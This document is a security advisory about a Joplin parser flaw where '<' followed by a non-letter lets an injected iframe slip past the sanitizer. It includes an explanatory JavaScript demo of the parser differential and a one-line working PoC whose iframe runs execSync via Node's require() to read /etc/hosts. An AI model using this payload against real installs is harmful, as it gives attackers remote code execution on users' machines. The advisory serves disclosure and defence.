Summary
There is a parsing error that allows for arbitrary tag injection which leads to RCE.
Details
Joplin's parser does not account for the HTML rule that a "<" followed by a non-letter character is not treated as the start of a tag, so its sanitizer and the browser's renderer disagree about where a tag begins.
As a result, an XSS is possible by placing an "illegal" tag inside another tag.
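The parser differential described above, as an added illustration that is not Joplin's own code: a naive sanitizer that treats everything between "<" and ">" as one tag is compared with a tokenizer that follows the HTML rule, using a constructed, harmless sample (`src=x`) with the same `<.a<iframe` structure as the advisory's payload. The blocklist and function names are assumptions for this example.

```javascript
// Added example, not Joplin's code. Demonstrates why "<.a<iframe ...>" slips
// past a naive tag-based sanitizer but is still rendered as an iframe.

// Tags a hypothetical sanitizer intends to block.
const BLOCKED = new Set(['iframe', 'script', 'object', 'embed']);

// Naive tokenizer: everything from "<" up to the next ">" is one tag, and the
// tag name is the run of non-space characters after "<".
function naiveTagNames(html) {
  const names = [];
  const re = /<([^>\s]+)[^>]*>/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Naive sanitizer built on the tokenizer above: drops a tag only when its
// (mis-parsed) name is on the blocklist.
function naiveSanitize(html) {
  return html.replace(/<([^>\s]+)[^>]*>/g, (tag, name) =>
    BLOCKED.has(name.toLowerCase()) ? '' : tag);
}

// Spec-style tokenizer: "<" opens a tag only when followed by an ASCII letter;
// otherwise the "<" is ordinary text and scanning continues at the next char.
function specTagNames(html) {
  const names = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] === '<' && /[A-Za-z]/.test(html[i + 1] || '')) {
      let j = i + 1;
      while (j < html.length && /[A-Za-z0-9]/.test(html[j])) j++;
      names.push(html.slice(i + 1, j).toLowerCase());
      const end = html.indexOf('>', j);
      i = end === -1 ? html.length : end + 1;
    } else {
      i++;
    }
  }
  return names;
}

// Detection check: blocked elements the browser will see that the naive
// sanitizer never recognised as tags.
function parserDifferential(html) {
  const naive = new Set(naiveTagNames(html));
  return specTagNames(html).filter(n => BLOCKED.has(n) && !naive.has(n));
}

// Constructed sample with the advisory's shape but a harmless iframe source.
const SAMPLE = '<div>\n<.a<iframe src=x>';
```

Running `parserDifferential(SAMPLE)` returns `['iframe']`, while `naiveSanitize(SAMPLE)` returns the input unchanged because the naive parser saw a tag named `.a<iframe`, not `iframe`.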
PoC
Paste this into any note; the PoC will read the /etc/hosts file.
<div>
<.a<iframe src=javascript:try{top.alert(parent.parent.require('child_process').execSync('echo\x20$(cat\x20/etc/hosts)'))}catch(e){top.alert(e)} >
Impact
This leads to RCE: the injected iframe runs JavaScript that reaches Node's require() and executes shell commands.